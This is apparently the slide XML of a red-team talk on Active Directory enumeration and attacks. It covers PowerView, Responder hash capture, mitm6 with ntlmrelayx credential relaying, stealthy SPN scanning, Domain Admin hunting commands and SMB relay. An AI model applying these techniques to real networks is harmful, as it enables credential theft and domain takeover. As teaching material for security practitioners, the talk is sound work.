            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>PowerView for enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Responder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Industry “go to” tool for poisoning attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Capture ntlm hashes from a variety of services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>RDP server as of 2.3.4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Impacket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Crackmapexec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>Sys internals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="480060" indent="-240030" defTabSz="315468">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr sz="1836"/>
            </a:pPr>
            <a:r>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>live.sysinternals.com</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Get-command -all"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Get-command -all</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24">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2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2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2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2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224">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224">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224">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224">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0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224">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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224">
                                            <p:txEl>
                                              <p:pRg st="10" end="1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Class="entr" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="224">
                                            <p:txEl>
                                              <p:pRg st="11" end="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24" grpId="1"/>
    </p:bldLst>
  </p:timing>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9" name="Mitm6…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320040" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>Mitm6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="640080" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>By default windows prefers DNS over IPv6 to IPv4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="640080" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>MITM6 takes advantage of this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="640080" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>As DNS server, mitm6 will selectively reply to DNS queries of the attackers choosing and redirect the victims traffic to the attacker machine instead of the legitimate server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="640080" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>designed to work together with ntlmrelayx from impacket for WPAD spoofing and credential relaying.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="640080" indent="-320040" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:defRPr sz="2448"/>
            </a:pPr>
            <a:r>
              <a:t>Basically accomplishes what you would with responder with relying on LLMNR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Get-command -all"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Get-command -all</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29">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2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2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29">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29">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229">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229">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29" grpId="1"/>
    </p:bldLst>
  </p:timing>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4" name="AD Enumeration"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>AD Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="235" name="adenumeration.jpg" descr="adenumeration.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2692400" y="2336800"/>
            <a:ext cx="7620000" cy="5080000"/>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xit" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="23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23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35" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="234" grpId="1"/>
    </p:bldLst>
  </p:timing>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7" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Find-ldapobject"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Find-ldapobject</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Use LDAP instead of DNS to avoid DNS logs…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use LDAP instead of DNS to avoid DNS logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-ADComputer -filter * -Properties ipv4address |where {$_.IPV4address} | select name,ipv4address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="240" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755414" y="1588906"/>
            <a:ext cx="6199572" cy="6754366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="538938" y="6089709"/>
            <a:ext cx="9690101" cy="2743201"/>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5" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Find-PSServiceAccounts"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Find-PSServiceAccounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Spn Scanning is the new port scanning…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Spn Scanning is the new port scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>To avoid detection we can look for services using LDAP queries to look for Service Principal Names (SPN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Every Service that uses Kerberos must register an SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>MYSSQLSvc, TERMSERV, WSMan, exchangeMDB, ect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SPN directory can be found </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?page_id=183</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1" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Find-PSServiceAccounts"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Find-PSServiceAccounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Written by Sean Metcaff…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Written by Sean Metcaff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="254" name="Screen Shot 2019-03-05 at 12.27.56 PM.png" descr="Screen Shot 2019-03-05 at 12.27.56 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481330" y="5716904"/>
            <a:ext cx="8042140" cy="2985260"/>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Whoami /all"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Whoami /all </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Blake {@fightnerd me@blaketownsend.com}…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Blake {@fightnerd </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>me@blaketownsend.com</a:t>
            </a:r>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cofounder Central Arkansas Hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Work as penetration tester/ red teamer at PCA Technology Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Formerly at large FinTech Company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Opinions are my own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Harvester of nerd tears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70">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7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70">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70">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70">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170">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170">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70" grpId="1"/>
    </p:bldLst>
  </p:timing>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8" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="259" name="Screen Shot 2019-03-05 at 1.23.12 PM.png" descr="Screen Shot 2019-03-05 at 1.23.12 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="3759" t="0" r="3759" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285950" y="1783935"/>
            <a:ext cx="5312451" cy="7550565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Get-Netuser"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Get-Netuser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="User Hunting…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209439" y="2165350"/>
            <a:ext cx="7025680" cy="6108700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User Hunting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Get-NetGroupMember ‘Domain Admins’ -Recurse</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>Get-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Net-GroupMember</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7F7F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E487A4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Domain Admins'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F7F7F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE9C2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Recurse </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFE9C2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFE9C2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get-NetUser -AdminCount | select name,whencreated,pwdlastset,lastlogon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Screen Shot 2019-03-05 at 1.29.38 PM.png" descr="Screen Shot 2019-03-05 at 1.29.38 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="108991" y="7737298"/>
            <a:ext cx="7109696" cy="1760120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>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6" name="AD Attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>AD Attacks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xit" nodeType="clickEffect" presetSubtype="0" presetID="1" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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66" grpId="1"/>
    </p:bldLst>
  </p:timing>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8" name="SMB Relay attack…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SMB Relay attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Why crack NTLMv2 Hashes when you can just relay them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Used Requires SMB Signing not be forced on target (default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Recent research has not been kind to NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Easily get DomainAdmin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Invoke-thehash"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
